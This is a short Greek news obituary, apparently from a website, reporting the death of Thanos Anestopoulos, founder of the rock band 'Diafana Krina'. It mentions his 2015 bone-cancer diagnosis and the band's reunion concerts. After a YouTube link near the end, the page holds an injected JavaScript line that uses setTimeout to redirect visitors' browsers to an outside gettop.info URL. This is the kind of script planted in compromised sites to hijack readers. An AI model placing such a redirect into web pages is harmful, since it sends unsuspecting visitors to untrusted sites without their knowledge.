Έφυγε από τη ζωή ο δημιουργός των «Διάφανων Κρίνων», Θάνος Ανεστόπουλος

0
3

 

Έφυγε από τη ζωή ένας από τους μεγαλύτερους δημιουργούς στον χώρο της ελληνικής ροκ σκηνής και μια πολύπλευρη καλλιτεχνική προσωπικότητα, ο Θάνος Ανεστόπουλος.

Ο δημιουργός του συγκροτήματος «Διάφανα Κρίνα» χάραξε τη δική του πορεία στον ελληνικό μουσικό χώρο με το ιδιαίτερο ύφος στη μουσική, στον στίχο αλλά και την ερμηνεία. Ο ήχος των «Διάφανων Κρίνων» επηρέασε πολλά συγκροτήματα και καλλιτέχνες στη ροκ μουσική σκηνή.

Τον Μάιο του 2015 ο Θάνος Ανεστόπουλος είχε πληροφορήσει τους θαυμαστές του μέσω της προσωπικής του σελίδας στο Facebook ότι έπασχε από μεταστατικό καρκίνο των οστών.

Τον Σεπτέμβριο του ίδιου έτους το συγκρότημα, που είχε διαλυθεί το 2009, επανενώθηκε και πρόσφερε στο κοινό δύο ξεχωριστές συναυλίες στην Τεχνόπολη με τη συμμετοχή και άλλων καλλιτεχνών. Ακολούθησαν άλλες δύο συγκλονιστικές εμφανίσεις στο Παλλάς τον Μάιο και στη Μονή Λαζαριστών.

Ειδικά η παράσταση στο Παλλάς στις 14 Μαΐου ήταν έντονα συγκινησιακά φορτισμένη με τον Θάνο Ανεστόπουλο να είναι εμφανώς καταβεβλημένος σωματικά, αλλά έστειλε ένα μήνυμα ελπίδας κι αισιοδοξίας.

https://www.youtube.com/watch?v=AfuEmz44rDk setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here